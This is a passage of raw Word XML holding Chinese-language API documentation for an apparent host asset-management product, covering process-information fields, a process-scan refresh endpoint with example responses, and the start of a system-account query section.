      <w:tr w:rsidR="00497C54" w14:paraId="551D4EDF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46242297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734FCD46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5782EF23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="551D0388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DBF9A8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6067B260" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05330643" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1183F5B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E75F188" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="151D2E67" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A987973" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6677F808" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23734125" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1796F40C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="616E23EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B89E82E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149D007C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66284B5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint (20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E04970" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组id，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06F3257B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59653DEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C05661F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162B6F82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B618334" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程启动的TTY，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01DDF5EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38F18D04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25BBA82C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2F7208" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="563672C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00000526" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2FDFA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36A32A96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA59A14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6814C615" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>会话id, 仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50159F6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD23D67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sessionName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B8A4D8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33CDACCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="746B3678" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>会话名，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="762C6F95" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68918F3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3330AF97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCCEF92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0FAB53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程类型，1-应用程序 2-后台程序 3-windows进程，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25F75054" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C19E91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BECE8D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AAD0A25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6B1452" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程描述，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FB3D928" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD16562" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2B234A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F59AAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="793C0C61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程用户组，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E0A218B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019E8703" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39AE2966" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69770771" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16657A1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程可执行文件大小，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75B5B320" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="进程信息扫描"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>进程信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5C677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求进程信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB962D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D191C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/process/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05391C12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF68A4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F246272" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E18B5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/process/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ABD0AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70E2DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB778B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E61219" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425113A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回部分</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4F09489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B6B23CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1848D27A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CBF60D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F32619" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4745B461" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323211C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E11274" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668DBC16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="667590ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5825D6BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="进程信息查询扫描状态"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:t>进程信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EABE0E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询进程信息的扫描状态；具体请求方式参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="资产通用查询扫描状态">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>资产通用查询扫描状态</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E012B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="系统账号信息"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t>系统账号信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B395E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0014B626" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的系统账号信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C91F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5298997B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>系统账号信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344E89D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C9C36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2421A0E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39269D3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196A95B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE2037" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>系统账号信息查询扫描状态</w:t>
      </w:r>
    </w:p>
